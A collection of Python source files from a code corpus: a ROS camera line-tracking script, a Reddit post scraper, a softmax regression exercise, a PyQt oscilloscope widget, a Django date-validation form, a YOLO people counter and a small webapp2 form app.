xmin2:xmax2],cv2.COLOR_BGR2GRAY)\n if k!=1:\n gris2 = cv2.blur(gris2,(k,k))\n \n #appliquer canny\n capteur2 = cv2.Canny(gris2,th1,th2)\n \n cv2.rectangle(img_clone,(xmin1,ymin),(xmax1,ymax),(0,0,255),1)\n cv2.rectangle(img_clone,(xmin2,ymin),(xmax2,ymax),(0,0,255),1)\n\n s1 = point(capteur1[0])\n if s1!=-1:\n cv2.circle(img_clone,(s1+xmin1,ymin),3,(0,255,0), 3)\n s1_old =s1\n global s1_time \n s1_time= time.time()\n else :\n global t1\n t1 =time.time()-s1_time\n if t1 < 4:\n cv2.circle(img_clone,(s1_old+xmin1,ymin),3,(100,255,255),3)\n s1=s1_old\n else :\n s1=-1\n\n s2 = point(capteur2[0])\n if s2!=-1:\n cv2.circle(img_clone,(s2+xmin2,ymin),3,(0,255,0), 3)\n s2_old =s2\n global s2_time \n s2_time = time.time()\n else :\n t2 = time.time()-s2_time \n if t2< 4:\n cv2.circle(img_clone,(s2_old+xmin2,ymin),3,(100,255,255),3)\n s2=s2_old\n else :\n s2=-1\n\n cv2.circle(img_clone,(160,120),3,(10,10,10),3)\n\n cv2.circle(img_clone,(abs((s2+xmin2-s1)/2),ymin),3,(100,100,255),3)\n\n if s1!=-1 and s2!=-1:\n error_manager.data = False\n pub.publish(error_manager)\n s2_= abs(xmax2-xmin2-s2)\n if abs(s2_-s1) > 20 :\n c = (0,max(0,255-10*int(abs(s1-s2_)/2)),min(255,10*int(abs(s1-s2_)/2)))\n cv2.arrowedLine(img_clone, (int((xmax2-xmin1)/2)+xmin1,ymax-25),(int((xmax2-xmin1)/2)+xmin1+2*int((s1-s2_)/2),ymax-25),c,3,tipLength=0.4)\n else :\n cv2.putText(img_clone,\"ok\",(int((xmax2-xmin1)/2)+xmin1-15,ymax-16),cv2.FONT_HERSHEY_COMPLEX_SMALL,1,(0,255,0),1)\n elif (s1==-1 or s2==-1) and (t1 > 15 or t2 >= 15) :\n \n'''\n \n \n\ndef main(args):\n # if __name__ == '__main__':\n 
global pub\n global pub1\n global pub2\n global thetaf\n\n\n # ax.set_facecolor('#DEDEDE')\n rospy.init_node('traitement')\n\n pub = rospy.Publisher(\"/traitement/error_manager\",Bool,queue_size=10)\n \n pub2 = rospy.Publisher(\"/traitement/filtre\",Float64,queue_size=10)\n\n pub1 = rospy.Publisher(\"/control/angle\",Point,queue_size=10)\n\n image = rospy.Subscriber(\"/raspicam_node/image\", Image, callback)\n \n rospy.spin()\n\n\n#------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n \n\n","sub_path":"src/images_process/scripts/traitement.py","file_name":"traitement.py","file_ext":"py","file_size_in_byte":12373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"128815241","text":"#/u/GoldenSights\nimport traceback\nimport praw # simple interface to the reddit API, also handles rate limiting of requests\nimport time\nimport datetime\nimport pickle\nimport string\n\n'''USER CONFIGURATION'''\n\nUSERNAME = \"\"\n#This is the bot's Username. In order to send mail, he must have some amount of Karma.\nPASSWORD = \"\"\n#This is the bot's Password. \nUSERAGENT = \"NSALeaks Content scrapper. To be used to populate a list to be used for More Article section of /r/NSALeaks wiki\"\n#This is a short description of what the bot does. For example \"/u/GoldenSights' Newsletter bot\"\nSUBREDDIT = \"nsaleaks\"\n#This is the sub or list of subs to scan for new posts. For a single sub, use \"sub1\". For multiple subs, use \"sub1+sub2+sub3+...\". For all use \"all\"\nKEYWORDS = string.ascii_letters\n#Words to look for\nKEYDOMAINS = []\n#Domains to look for\nKEYNAMES = [\"\"]\n#Names to look for\n\nIGNORESELF = False\n#Do you want the bot to dump selfposts? Use True or False (Use capitals! No quotations!)\nTIMESTAMP = '%A %d %B %Y'\n#The time format.\n# \"%A %d %B %Y\" = \"Wendesday 04 June 2014\"\n#http://docs.python.org/2/library/time.html#time.strftime\n\nHEADER = \"\"\n#Put this at the top of the .txt file\n\n#FORMAT = \"_timestamp_: [_title_](_url_) - /u/_author_ - [**Discussion**](_nplink_)\"\nFORMAT = \">>\\n* [_title_](_url_) - _flairtext_\\n>>\"\nTSFORMAT = \">_timestamp_\\n\"\n#USE THESE INJECTORS TO CREATE CUSTOM OUTPUT\n#_timestamp_ which follows the TIMESTAMP format\n#_title_\n#_url_\n#_subreddit_\n#_nplink_\n#_author_\n#_numcomments_\n#_score_\n\nPRINTFILE = \"nsa\"\n#Name of the file that will be produced. Do not type the file extension\n\nMAXPOSTS = 100\n#This is how many posts you want to retrieve all at once.\n\nREAD_FROM_FILE = \"botwatch.db\"\n# A text file where a post ID is on each line\n# These will be collected before anything from /new\n\n'''All done!'''\n\ntry:\n import bot #This is a file in my python library which contains my Bot's username and password. 
I can push code to Git without showing credentials\n USERNAME = bot.uG\n PASSWORD = bot.pG\n USERAGENT = bot.aG\nexcept ImportError:\n pass\n\nprint('Logging in as ' + USERNAME)\nr = praw.Reddit(USERAGENT)\nr.login(USERNAME, PASSWORD)\n\ndef scansub():\n\tlista = []\n\tcount = 0\n\tcounta = 0\n\ttry:\n\t\tprint('Scanning.')\n\t\tsubreddit = r.get_subreddit(SUBREDDIT)\n\t\tposts = subreddit.get_new(limit=MAXPOSTS)\n\t\tfor post in posts:\n\t\t\tif not post.is_self or IGNORESELF == False:\n\t\t\t\ttry:\n\t\t\t\t\tauthor = post.author.name\n\t\t\t\texcept Exception:\n\t\t\t\t\tauthor = '[DELETED]'\n\t\t\t\tif any(m.lower() in post.title.lower() for m in KEYWORDS) \\\n\t\t\t\tor any(m.lower() in post.url.lower() for m in KEYDOMAINS) \\\n\t\t\t\tor any(m.lower() == author.lower() for m in KEYNAMES):\n\t\t\t\t\tlista.append(post)\n\t\t\t\t\tcounta += 1\n\t\t\tcount += 1\n\t\t\tprint('%d / %d | %d' % (count, MAXPOSTS, counta))\n\t\t\n\t\tfor item in lista:\n\t\t\tif item.author is None:\n\t\t\t\titem.author = '[DELETED]'\n\texcept Exception:\n\t\ttraceback.print_exc()\n\tprint('Collected ' + str(counta) + ' items.')\n\treturn lista\n\ndef scanfile():\n\tidfile = open(READ_FROM_FILE)\n\tlines = [line.strip() for line in idfile.readlines()]\n\tidfile.close()\n\tfor lineindex in range(len(lines)):\n\t\tif 't3_' not in lines[lineindex]:\n\t\t\tlines[lineindex] = 't3_' + lines[lineindex]\n\tfilesize = len(lines)\n\tprint('Found %d ids in file %s' % (filesize, READ_FROM_FILE_IDS))\n\n\tlista = []\n\tcount = 0\n\twhile len(lines) > 0:\n\t\tposts = list(r.get_info(thing_id=lines[:100]))\n\t\tlines = lines[100:]\n\t\tfor post in posts:\n\t\t\tif post.author is None:\n\t\t\t\tpost.author = '[DELETED]'\n\t\t\tlista.append(post)\n\t\t\tcount += 1\n\t\tprint('%d / %d' % (count, filesize))\n\treturn lista\n\n\ndef work(lista, listfile):\n\tif HEADER != \"\":\n\t\tprint(HEADER, file=listfile)\n\tprevious_timestamp = \"\"\n\tfor post in lista:\n\t\ttimestamp = post.created_utc\n\t\ttimestamp = datetime.datetime.fromtimestamp(int(timestamp)).strftime(TIMESTAMP)\n\t\tfinal = FORMAT\n\t\tif timestamp != previous_timestamp:\n\t\t\tfinal = TSFORMAT + final\n\t\tfinal = final.replace('_timestamp_', timestamp)\n\t\tfinal = final.replace('_title_', post.title)\n\t\tflair_text = post.link_flair_text if post.link_flair_text else \"\"\n\t\tflair_css = post.link_flair_css_class if post.link_flair_css_class else \"\"\n\t\tpost.link_flair_text = flair_text\n\t\tpost.link_flair_css_class = flair_css\n\t\tfinal = final.replace('_flairtext_', flair_text)\n\t\tfinal = final.replace('_flaircss_', flair_css)\n\t\ttry:\n\t\t\tfinal = final.replace('_author_', post.author.name)\n\t\texcept Exception:\n\t\t\tfinal = final.replace('_author_', '[DELETED]')\n\t\tfinal = final.replace('_subreddit_', post.subreddit.display_name)\n\t\turl = post.url\n\t\turl = url.replace('http://www.reddit.com', 'http://np.reddit.com')\n\t\tfinal = final.replace('_url_', url)\n\t\tslink = post.short_link\n\t\tslink = slink.replace('http://', 'http://np.')\n\t\tfinal = final.replace('_nplink_', slink)\n\t\tfinal = final.replace('_flairtext_', flair_text)\n\t\tfinal = final.replace('_score_', str(post.score))\n\t\tfinal = final.replace('_numcomments_', str(post.num_comments))\n\t\tprint(final, file=listfile)\n\t\tprevious_timestamp = timestamp\n\n\ndef writeindividual(printstatement, lista, sortmode, reverse, filesuffix):\n\tprint(printstatement)\n\tlista.sort(key=sortmode, reverse=reverse)\n\tlistfile = open(PRINTFILE + filesuffix, 'w', 
encoding='utf-8')\n\twork(lista, listfile)\n\tlistfile.close()\n\n\ndef writefiles(lista):\n\twriteindividual('Writing time file', lista,\n\t\tlambda x:x.created_utc, True, '_date.txt')\n\t\n\twriteindividual('Writing subreddit file', lista,\n\t\tlambda x:x.subreddit.display_name.lower(), False, '_subreddit.txt')\n\t\n\twriteindividual('Writing title file', lista,\n\t\tlambda x:x.title.lower(), False, '_title.txt')\n\t\n\twriteindividual('Writing author file', lista,\n\t\tlambda x:x.author.name.lower(), False, '_author.txt')\n\t\n\tprint('Writing flair file')\n\tnow = datetime.datetime.now(datetime.timezone.utc).timestamp()\n\tlista.sort(key=lambda x: (x.link_flair_text, now-x.created_utc))\n\tfor index in range(len(lista)):\n\t\tif lista[index].link_flair_text != \"\":\n\t\t\tlista = lista[index:] + lista[:index]\n\t\t\tbreak\n\tlistfile = open(PRINTFILE + '_flair.txt', 'w', encoding='utf-8')\n\twork(lista, listfile)\n\tlistfile.close()\n\t\n\tprint('Saving to Pickle.')\n\tclass Posted(object):\n\t\tpass\n\tlistc = []\n\tfor item in lista:\n\t\tobj = Posted()\n\t\tobj.id = item.id\n\t\tobj.fullname = item.fullname\n\t\tobj.created_utc = item.created_utc\n\t\tobj.title = item.title\n\t\tobj.subreddit = item.subreddit.display_name\n\t\tobj.url = item.url\n\t\tobj.short_link = item.short_link\n\t\ttry:\n\t\t\tobj.author = item.author.name\n\t\texcept:\n\t\t\tobj.author = '[DELETED]'\n\t\tif item.is_self == True:\n\t\t\tobj.is_self = True\n\t\t\tobj.selftext = item.selftext\n\t\telse:\n\t\t\tobj.is_self = False\n\t\tlistc.append(obj.__dict__)\n\tfilec = open(PRINTFILE + '.p', 'wb')\n\tpickle.dump(listc, filec)\n\tfilec.close()\n\tprint('Done.')\n\ndef removeduplicates(lista):\n\tprint('Removing duplicate posts in list')\n\tnodupes = []\n\tfor post in lista:\n\t\tif not any(p.id == post.id for p in nodupes):\n\t\t\tnodupes.append(post)\n\treturn nodupes\n\n\ndef main():\n\tlista = []\n\tif READ_FROM_FILE_IDS:\n\t\tscanfile()\n\telse:\n\t\tlista = scansub()\n\t\tlista = removeduplicates(lista)\n\n\twritefiles(lista)\n\nmain()\nquit()","sub_path":"Redmash/redmash_new.py","file_name":"redmash_new.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"422821599","text":"import sys\nsys.path.append(\"..\")\nimport utils\nfrom utils import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.sparse as sparse\n\n\ndef augment_feature_vector(X):\n \"\"\"\n Adds the x[i][0] = 1 feature for each data point x[i].\n\n Args:\n X - a NumPy matrix of n data points, each with d - 1 features\n\n Returns: X_augment, an (n, d) NumPy array with the added feature\n for each datapoint\n \"\"\"\n column_of_ones = np.zeros([len(X), 1]) + 1\n return np.hstack((column_of_ones, X))\n\n\ndef compute_probabilities(X, theta, temp_parameter):\n \"\"\"\n Computes, for each datapoint X[i], the probability that\n X[i] is labeled as j\n for j = 0, 1, ..., k-1\n\n Args:\n X - (n, d) NumPy array (n datapoints each with d features)\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n temp_parameter - the temperature parameter of softmax function (scalar)\n Returns:\n H - (k, n) NumPy array, where each entry H[j][i] is the probability\n that X[i] is labeled as j\n \"\"\"\n\n expsum = 0\n H = np.zeros((theta.shape[0], X.shape[0]))\n multmat = np.dot(X, theta.T)\n cmax = np.max(multmat/temp_parameter, axis=1)\n\n expsum = np.sum(np.exp((multmat/temp_parameter).T-cmax), axis=0)\n\n 
H = (1/expsum) * np.exp((multmat/temp_parameter).T-cmax)\n\n return H\n\n\ndef compute_cost_function(X, Y, theta, lambda_factor, temp_parameter):\n \"\"\"\n Computes the total cost over every datapoint.\n\n Args:\n X - (n, d) NumPy array (n datapoints each with d features)\n Y - (n, ) NumPy array containing the labels (a number from 0-9)\n for each data point\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n lambda_factor - the regularization constant (scalar)\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns\n c - the cost value (scalar)\n \"\"\"\n\n loss = 0\n\n probs = compute_probabilities(X, theta, temp_parameter).T\n\n mask = np.ones((probs.shape[0], probs.shape[1]))\n\n for i in range(probs.shape[0]):\n for j in range(probs.shape[1]):\n if Y[i] == j:\n mask[i, j] = False\n\n masked = np.ma.array(probs, mask=mask)\n\n loss = np.sum(np.log(masked))\n theta_sum = 0.5 * lambda_factor * np.sum(theta**2)\n\n return (-1/probs.shape[0])*loss+theta_sum\n\n\ndef run_gradient_descent_iteration(X, Y, theta, alpha,\n lambda_factor, temp_parameter):\n \"\"\"\n Runs one step of batch gradient descent\n\n Args:\n X - (n, d) NumPy array (n datapoints each with d features)\n Y - (n, ) NumPy array containing the labels (a number from 0-9)\n for each data point\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n alpha - the learning rate (scalar)\n lambda_factor - the regularization constant (scalar)\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns:\n theta - (k, d) NumPy array that is the final value of parameters theta\n \"\"\"\n\n probs = compute_probabilities(X, theta, temp_parameter).T\n grad = np.zeros((theta.shape[0], theta.shape[1]))\n\n mask = [[1 if Y[i] == j else 0 for j in range(probs.shape[1])]\n for i in range(probs.shape[0])]\n\n mask_s = sparse.coo_matrix(mask)\n probs_s = sparse.coo_matrix(probs)\n X_s = sparse.coo_matrix(X)\n\n tempsum = np.dot(X_s.T, mask_s-probs_s).T\n\n grad = (-1/(X.shape[0]*temp_parameter)) * tempsum + lambda_factor * theta\n\n return np.array(theta-alpha*grad)\n\n\ndef update_y(train_y, test_y):\n \"\"\"\n Changes the old digit labels for the training and test set for\n the new (mod 3) labels.\n\n Args:\n train_y - (n, ) NumPy array containing the labels\n (a number between 0-9) for each datapoint in the training set\n test_y - (n, ) NumPy array containing the labels (a number between 0-9)\n for each datapoint in the test set\n\n Returns:\n train_y_mod3 - (n, ) NumPy array containing the new labels\n (a number between 0-2) for each datapoint in the training set\n test_y_mod3 - (n, ) NumPy array containing the new labels\n (a number between 0-2) for each datapoint in the test set\n \"\"\"\n train_y_mod3 = np.mod(train_y, 3)\n test_y_mod3 = np.mod(test_y, 3)\n\n return train_y_mod3, test_y_mod3\n\n\ndef compute_test_error_mod3(X, Y, theta, temp_parameter):\n \"\"\"\n Returns the error of these new labels when the classifier predicts\n the digit. 
(mod 3)\n\n Args:\n X - (n, d - 1) NumPy array (n datapoints each with d - 1 features)\n Y - (n, ) NumPy array containing the labels (a number from 0-2)\n for each data point\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns:\n test_error - the error rate of the classifier (scalar)\n \"\"\"\n count = 0\n Y_test = np.mod(get_classification(X, theta, temp_parameter), 3)\n\n for i in range(Y.shape[0]):\n if Y[i] != Y_test[i]:\n count += 1\n return count/Y.shape[0]\n\n\ndef softmax_regression(X, Y, temp_parameter, alpha,\n lambda_factor, k, num_iterations):\n \"\"\"\n Runs batch gradient descent for a specified number of iterations\n on a dataset with theta initialized to the all-zeros array.\n Here, theta is a k by d NumPy array\n where row j represents the parameters of our model for label j for\n j = 0, 1, ..., k-1\n\n Args:\n X - (n, d - 1) NumPy array (n data points, each with d-1 features)\n Y - (n, ) NumPy array containing the labels (a number from 0-9)\n for each data point\n temp_parameter - the temperature parameter of softmax function (scalar)\n alpha - the learning rate (scalar)\n lambda_factor - the regularization constant (scalar)\n k - the number of labels (scalar)\n num_iterations - the number of iterations to run gradient\n descent (scalar)\n\n Returns:\n theta - (k, d) NumPy array that is the final value of parameters theta\n cost_function_progression - a Python list containing\n the cost calculated at each step of gradient descent\n \"\"\"\n X = augment_feature_vector(X)\n theta = np.zeros([k, X.shape[1]])\n cost_function_progression = []\n for i in range(num_iterations):\n cost_function_progression.append(\n compute_cost_function(X, Y,\n theta,\n lambda_factor,\n temp_parameter))\n theta = run_gradient_descent_iteration(\n X, Y, theta, alpha, lambda_factor, temp_parameter)\n return theta, cost_function_progression\n\n\ndef get_classification(X, theta, temp_parameter):\n \"\"\"\n Makes predictions by classifying a given dataset\n\n Args:\n X - (n, d - 1) NumPy array (n data points, each with d - 1 features)\n theta - (k, d) NumPy array where row j represents the parameters\n of our model for label j\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns:\n Y - (n, ) NumPy array, containing the predicted label\n (a number between 0-9) for each data point\n \"\"\"\n X = augment_feature_vector(X)\n probabilities = compute_probabilities(X, theta, temp_parameter)\n return np.argmax(probabilities, axis=0)\n\n\ndef plot_cost_function_over_time(cost_function_history):\n plt.plot(range(len(cost_function_history)), cost_function_history)\n plt.ylabel('Cost Function')\n plt.xlabel('Iteration number')\n plt.show()\n\n\ndef compute_test_error(X, Y, theta, temp_parameter):\n assigned_labels = get_classification(X, theta, temp_parameter)\n return 1 - np.mean(assigned_labels == Y)\n","sub_path":"project_2/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":8020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"79049898","text":"\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport pyqtgraph as pg\n\n\nimport numpy as np\n\n\nfrom .singleChannel_ui import Ui_Form\n\n\nimport scipy.integrate as spi\n\n\nimport re\nraise RuntimeError(\"this file shoulnd't be called from ehre\")\n\npg.setConfigOption('background', 'w')\npg.setConfigOption('foreground', 
'k')\n\nclass ScopeViewWidget(QtWidgets.QWidget):\n sigBoxcarValue = QtCore.pyqtSignal(object)\n sigUpdateData = QtCore.pyqtSignal()\n\n def __init__(self, name=None):\n super(ScopeViewWidget,self).__init__()\n self.name = name\n self.initSettings()\n self.initUI()\n self.sigUpdateData.connect(self.updatePlots)\n self.data = np.array([])\n\n def __str__(self):\n return self.name\n\n def initSettings(self):\n s = dict()\n s['bcpyBG'] = [0, 0]\n s['bcpySG'] = [0, 0]\n\n self.settings = s\n\n def initUI(self):\n #Import ui file from designer\n self.ui = Ui_Form()\n self.ui.setupUi(self)\n\n self.pPlot = self.ui.gPlot.plot(pen='k')\n plotitem = self.ui.gPlot.getPlotItem()\n plotitem.setTitle(self.name)\n plotitem.setLabel('bottom',text='Time',units='s')\n plotitem.setLabel('left',text='Voltage', units='V')\n\n #Make an array of all the textboxes for the linear regions to make it\n #easier to iterate through them. Set it up in memory identical to how it\n #appears on the panel for sanity, in a row-major fashion\n lrtb = [[self.ui.tBGStart, self.ui.tBGEnd],\n [self.ui.tSGStart, self.ui.tSGEnd]]\n # Connect the changes to update the Linear Regions\n for i in lrtb:\n for j in i:\n j.textAccepted.connect(self.updateLinearRegionsFromText)\n\n self.linearRegionTextBoxes = lrtb\n self.initLinearRegions()\n\n self.ui.bInit.clicked.connect(self.setLinearRegions)\n\n def initLinearRegions(self, item = None):\n #initialize array for all 5 boxcar regions\n self.boxcarRegions = [None]*2\n\n bgCol = pg.mkBrush(QtGui.QColor(255, 0, 0, 50))\n sgCol = pg.mkBrush(QtGui.QColor(0, 255, 0, 50))\n\n #Background region for the plot\n self.boxcarRegions[0] = pg.LinearRegionItem(self.settings['bcpyBG'], brush = bgCol)\n self.boxcarRegions[1] = pg.LinearRegionItem(self.settings['bcpySG'], brush = sgCol)\n\n #Connect it all to something that will update values when these all change\n for i in self.boxcarRegions:\n i.sigRegionChangeFinished.connect(self.updateLinearRegionValues)\n\n if item is None:\n item = self.ui.gPlot\n item.addItem(self.boxcarRegions[0])\n item.addItem(self.boxcarRegions[1])\n\n\n def updateLinearRegionValues(self):\n sender = self.sender()\n sendidx = -1\n for (i, v) in enumerate(self.boxcarRegions):\n #I was debugging something. I tried to use id(), which is effectively the memory\n #location to try and fix it. Found out it was anohter issue, but\n #id() seems a little safer(?) 
than just equating them in the sense that\n #it's explicitly asking if they're the same object, isntead of potentially\n #calling some weird __eq__() pyqt/graph may have set up\n if id(sender) == id(v):\n sendidx = i\n i = sendidx\n #Just being paranoid, no reason to think it wouldn't find the proper thing\n if sendidx<0:\n return\n self.linearRegionTextBoxes[i][0].setText('{:.9g}'.format(sender.getRegion()[0]))\n self.linearRegionTextBoxes[i][1].setText('{:.9g}'.format(sender.getRegion()[1]))\n\n # Update the dicionary values so that the bounds are proper when\n d = {0: \"bcpyBG\",\n 1: \"bcpySG\"\n }\n self.settings[d[i]] = list(sender.getRegion())\n\n def updateLinearRegionsFromText(self):\n sender = self.sender()\n #figure out where this was sent\n sendi, sendj = -1, -1\n for (i, v)in enumerate(self.linearRegionTextBoxes):\n for (j, w) in enumerate(v):\n if id(w) == id(sender):\n sendi = i\n sendj = j\n\n i = sendi\n j = sendj\n curVals = list(self.boxcarRegions[i].getRegion())\n curVals[j] = float(sender.text())\n self.boxcarRegions[i].setRegion(tuple(curVals))\n # Update the dicionary values so that the bounds are proper when\n d = {0: \"bcpyBG\",\n 1: \"bcpySG\",\n }\n self.settings[d[i]] = list(curVals)\n\n def setLinearRegions(self):\n try:\n length = self.data.shape[0]\n except:\n return\n newVal = self.data[int(length/2), 0]\n for i in self.boxcarRegions:\n i.setRegion((newVal, newVal))\n\n def updateData(self, data):\n self.data = data\n self.sigUpdateData.emit()\n\n def updatePlots(self):\n self.pPlot.setData(self.data)\n bg, sg = self.integrateData()\n self.ui.tBGBoxcar.setText(\"{:.5g}\".format(bg))\n self.ui.tSGBoxcar.setText(\"{:.5g}\".format(sg))\n self.sigBoxcarValue.emit(sg-bg)\n\n def changeName(self, name):\n self.name = name\n plotitem = self.ui.gPlot.getPlotItem()\n plotitem.setTitle(self.name)\n\n @staticmethod\n def findIndices(values, dataset):\n \"\"\"Given an ordered dataset and a pair of values, returns the indices which\n correspond to these bounds \"\"\"\n indx = list((dataset>values[0]) & (dataset date_of_admission:\n self._errors[\"date_of_birth\"] = self.error_class([_(\"Can't be born after admission!\")])\n self._errors[\"date_of_admission\"] = self.error_class([_(\"Can't be born after admission!\")])\n del cleaned_data[\"date_of_birth\"]\n del cleaned_data[\"date_of_admission\"]\n\n\n if date_of_surgical_procedure < date_of_admission:\n self._errors[\"date_of_surgical_procedure\"] = self.error_class([_(\"Can't be operated before admission!\")])\n self._errors[\"date_of_admission\"] = self.error_class([_(\"Can't be operated before admission!\")])\n del cleaned_data[\"date_of_surgical_procedure\"]\n del cleaned_data[\"date_of_admission\"]\n\n if date_of_surgical_procedure > date_of_discharge:\n self._errors[\"date_of_surgical_procedure\"] = self.error_class([_(\"Can't be operated after discharge!\")])\n self._errors[\"date_of_discharge\"] = self.error_class([_(\"Can't be operated after discharge!\")])\n del cleaned_data[\"date_of_surgical_procedure\"]\n del cleaned_data[\"date_of_discharge\"]\n\n return cleaned_data\n\n class Meta:\n model = c8\n exclude = ('added_by')\n\nclass FileUploadForm(forms.Form):\n file = forms.FileField()","sub_path":"report_forms/c8/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"591432294","text":"import cv2\r\nimport imutils\r\nimport numpy as np\r\n\r\nfrom detect_people import 
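# --- Added compatibility note for the YOLO output-layer lookup a few lines
# below (ln = [ln[i[0]-1] for i in net.getUnconnectedOutLayers()]): in OpenCV
# 4.5.4+ getUnconnectedOutLayers() returns a flat int array, so i[0] raises an
# error. A version-agnostic sketch:
import numpy as np

def output_layer_names(net):
    names = net.getLayerNames()
    idxs = np.asarray(net.getUnconnectedOutLayers()).flatten()
    return [names[int(i) - 1] for i in idxs]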
detect_people_classes\r\nfrom scipy.spatial import distance as dist\r\n\r\n\r\nlabels = open(\"coco.names\").read().strip().split(\"\\n\")\r\n\r\nnet = cv2.dnn.readNetFromDarknet(\"yolov3.cfg\", \"yolov3.weights\")\r\n\r\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\r\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\r\n\r\nln = net.getLayerNames()\r\nln = [ln[i[0]-1] for i in net.getUnconnectedOutLayers()]\r\n\r\n#img = cv2.imread('more_count.jpg')\r\nimg = cv2.imread('less_count.jpg')\r\n\r\n\r\n\r\nwhile True:\r\n frame = imutils.resize(img, width= 700)\r\n results = detect_people_classes(frame, net, ln, personIdx=labels.index(\"person\"))\r\n\r\n \r\n\r\n \r\n\r\n for (i, (prob, bbox, centroid,w,h)) in enumerate(results):\r\n (start_x, start_y, end_x, end_y) = bbox\r\n (cX, cY) = centroid\r\n\r\n if len(results) >=6:\r\n color = (0, 0, 255)\r\n else:\r\n color = (0, 255, 0)\r\n\r\n cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), color, 2)\r\n # cv2.circle(frame, (cX, cY), 5, color, 1)\r\n\r\n\r\n cv2.imshow(\"frame\", frame)\r\n key =cv2.waitKey(1) & 0xFF\r\n\r\n if key == ord(\"q\"):\r\n break\r\n\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"count_image.py","file_name":"count_image.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"202852392","text":"import webapp2\nimport cgi\nimport re\n\n\nform = \"\"\"\n\n\n\n\n\"\"\"\n\nbirthdayDayForm=\"\"\"\n\n
<form method=\"post\">\n\t<b>What is your birthday?</b>\n\t<br>\n\n
\t<label>Month <input type=\"text\" name=\"month\" value=\"%(month)s\"></label>\n\n\t<label>Day <input type=\"text\" name=\"day\" value=\"%(day)s\"></label>\n\n\t<label>Year <input type=\"text\" name=\"year\" value=\"%(year)s\"></label>\n\n
<div style=\"color: red\">%(error)s</div>\n\n\t<br>\n\t<input type=\"submit\">\n</form>\n\n\"\"\"\n\nsignupForm=\"\"\"\n\n
<form method=\"post\">\n <h2>Signup</h2>\n\n <label>Username <input type=\"text\" name=\"username\" value=\"%(username)s\"></label>\n\n <label>Password <input type=\"password\" name=\"password\" value=\"%(password)s\"></label>\n\n
 <label>Verify Password <input type=\"password\" name=\"verify\" value=\"%(verify)s\"></label>\n\n <label>Email (optional) <input type=\"text\" name=\"email\" value=\"%(email)s\"></label>\n\n
 <div style=\"color: red\">%(error)s</div>\n\n <input type=\"submit\">\n</form>
\n\n\n\"\"\"\n\n\ndef escape_html(s):\n return cgi.escape(s, quote=True)\n\ndef valid_month(month):\n months = ['January','February','March','April','May','June','July','August','September','October','November','December']\n month_abbvs = dict((m[:3].lower(),m) for m in months)\n if month:\n short_month = month[:3].lower()\n return month_abbvs.get(short_month)\n\n \ndef valid_day(day):\n if day.isdigit():\n day = int(day)\n if(day>=1 and day<=31):\n return day\n return None\n\n\ndef valid_year(year):\n if year.isdigit():\n year = int(year)\n if(year>=1900 and year<=2020):\n return year\n return None\n\n\nUSER_RE = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\ndef valid_username(username):\n return USER_RE.match(username)\n\nclass MainPage(webapp2.RequestHandler):\n\n def write_form(self, error=\"\", month=\"\", day=\"\", year=\"\"):\n self.response.out.write(birthdayDayForm % {\"error\": error,\n \"month\": escape_html(month),\n \"day\": escape_html(day),\n \"year\": escape_html(year)\n })\n\n def get(self):\n self.response.out.write(form)\n self.write_form()\n\n def post(self):\n\n month = self.request.get('month')\n day = self.request.get('day')\n year = self.request.get('year')\n\n user_month = valid_month(self.request.get('month'))\n user_day = valid_day(self.request.get('day'))\n user_year = valid_year(self.request.get('year'))\n\n if not(user_month and user_day and user_year):\n self.write_form(\"That does't look valide to me\", month, day, year)\n else:\n self.redirect('/thanks')\n\n\nclass ThanksHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write(\"Thanks for the submission\")\n\n\nclass SignUpHandler(webapp2.RequestHandler):\n def write_form(self, error=\"\", username=\"\", password=\"\", verify=\"\", email=\"\"):\n self.response.out.write(signupForm % {\"error\": error, \"username\": username, \n \"password\": password, \"verify\": verify,\n \"email\": email})\n\n def get(self):\n self.write_form()\n\n def post(self):\n username = self.request.get('username')\n\n username_valid = valid_username(username)\n\n if not (username_valid):\n self.write_form(\"Error in the sign up form\", username)\n else:\n self.redirect('/unit2/welcome?username=' + username)\n\n\n\nclass WelcomeHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write('Welcome')\n\n\nclass TestHandler(webapp2.RequestHandler):\n\tdef post(self):\n\t\t#q = self.request.get(\"q\")\n\t\t#self.response.write(q)\n\t\tself.response.headers['Content-Type'] = 'text/text'\n\t\tself.response.out.write(self.request)\n\n\napp = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/unit2/signup', SignUpHandler),\n ('/unit2/welcome', WelcomeHandler),\n ('/thanks', ThanksHandler),\n ('/testform', TestHandler)\n\t], 